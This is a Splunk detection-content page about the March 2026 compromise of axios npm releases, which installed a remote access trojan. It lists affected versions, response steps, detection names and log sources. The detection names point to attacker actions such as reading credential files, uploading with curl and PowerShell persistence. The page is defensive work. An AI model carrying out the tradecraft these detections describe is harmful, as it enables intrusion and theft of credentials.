GitHub Repo

Analytics Story: Axios Supply Chain Post Compromise

Date: 2026-03-31 ID: 2b1b0e8f-8674-4544-a209-a52e1ea4c2da Author: Teoderick Contreras, Splunk Product: Splunk Enterprise Security

Description

Leverage searches that help you detect and investigate post-compromise activity that may follow installation of compromised axios npm releases (notably axios@1.14.1 and axios@0.30.4) and the phantom dependency plain-crypto-js@4.2.1 from the March 2026 supply chain incident documented by Huntress, Socket, Step Security, and others.

The backdoored packages used a malicious postinstall script to drop a cross-platform remote access trojan with Windows, macOS, and Linux payloads, process staging, and command-and-control beaconing. Use these analytics alongside dependency audits and EDR data to scope impact, prioritize containment, and support recovery on hosts that resolved the malicious versions during the exposure window.

Why it matters

On March 31, 2026, attackers compromised the npm account of the lead axios maintainer and published two trojanized releases: axios@1.14.1 (tagged latest) and axios@0.30.4 (tagged legacy).

The packages introduced a dependency that legitimate axios never used—plain-crypto-js@4.2.1—whose sole purpose was to run a postinstall script that downloaded and executed a cross-platform RAT.

axios is one of the most widely used JavaScript HTTP clients, so CI/CD jobs, developer workstations, and applications that ran npm install during the roughly three-hour window could have pulled the malicious builds automatically, especially where semver caret ranges allowed the new versions to resolve without a locked lockfile.

Infection required no end-user action: installing dependencies was enough to trigger the dropper. Reporting from Huntress and the community noted infections beginning within minutes of publication, consistent with automated pipelines and local installs resolving ^1.x or similar ranges.

The dropper used obfuscation and post-execution cleanup (for example, replacing package metadata so the plain-crypto-js folder looked benign), which makes disk evidence easy to miss and raises the value of process, script, and network telemetry for confirming compromise on a host.

After the initial drop, platform-specific tradecraft unfolded—such as staging scripts under temp paths, abusing trusted interpreters, and beaconing to remote infrastructure. These behaviors are the post-compromise phase this story emphasizes: moving from a poisoned package install to hands-on access, reconnaissance, and persistence-style activity on Windows, macOS, or Linux endpoints. Detections aligned to this narrative help teams find execution chains that may not explicitly mention axios or npm in every event.

Organizations should treat any system that installed the known bad versions during the incident window as potentially breached: validate lockfiles and SBOMs, rotate credentials and tokens that could have been exposed on those machines, and hunt using the bundled analytics plus C2 and IOC lists from vendor advisories. Pairing these searches with asset and dependency inventory reduces blind spots where transitive JavaScript dependencies updated in the background.

Detections

Name ▲▼ Technique ▲▼ Type ▲▼
Executables Or Script Creation In Suspicious Path Masquerading Anomaly
Executables Or Script Creation In Temp Path Masquerading Anomaly
Linux Auditd File Permission Modification Via Chmod Linux and Mac File and Directory Permissions Modification Anomaly
Linux Auditd Possible Access To Credential Files /etc/passwd and /etc/shadow Anomaly
Linux Common Process For Elevation Control Setuid and Setgid Hunting
Linux Ingress Tool Transfer Hunting Ingress Tool Transfer Hunting
MacOS LOLbin Unix Shell TTP
PowerShell 4104 Hunting PowerShell Hunting
Powershell Fileless Script Contains Base64 Encoded Content Obfuscated Files or Information, PowerShell TTP
PowerShell Loading DotNET into Memory via Reflection PowerShell Anomaly
Recon Using WMI Class Gather Victim Host Information, PowerShell Anomaly
Registry Keys Used For Persistence Registry Run Keys / Startup Folder TTP
Windows Curl Upload to Remote Destination Ingress Tool Transfer TTP
Windows Process Execution From ProgramData Match Legitimate Resource Name or Location Hunting
Windows Process Execution in Temp Dir Create or Modify System Process, Match Legitimate Resource Name or Location Anomaly
Windows Renamed Powershell Execution Rename Legitimate Utilities TTP
Windows Suspicious Process File Path Create or Modify System Process, Match Legitimate Resource Name or Location TTP
Wscript Or Cscript Suspicious Child Process Process Injection, Parent PID Spoofing, Create or Modify System Process Anomaly

Data Sources

Name ▲▼ Platform ▲▼ Sourcetype ▲▼ Source ▲▼
Cisco Network Visibility Module Flow Data Network icon Network cisco:nvm:flowdata not_applicable
CrowdStrike ProcessRollup2 Other crowdstrike:events:sensor crowdstrike
Linux Auditd Proctitle Linux icon Linux auditd auditd
Osquery Results Other osquery:results osquery
Powershell Script Block Logging 4104 Windows icon Windows XmlWinEventLog XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
Sysmon EventID 1 Windows icon Windows XmlWinEventLog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 11 Windows icon Windows XmlWinEventLog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 13 Windows icon Windows XmlWinEventLog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon for Linux EventID 1 Linux icon Linux sysmon:linux Syslog:Linux-Sysmon/Operational
Windows Event Log Security 4688 Windows icon Windows XmlWinEventLog XmlWinEventLog:Security

References

Source: GitHub | Version: 1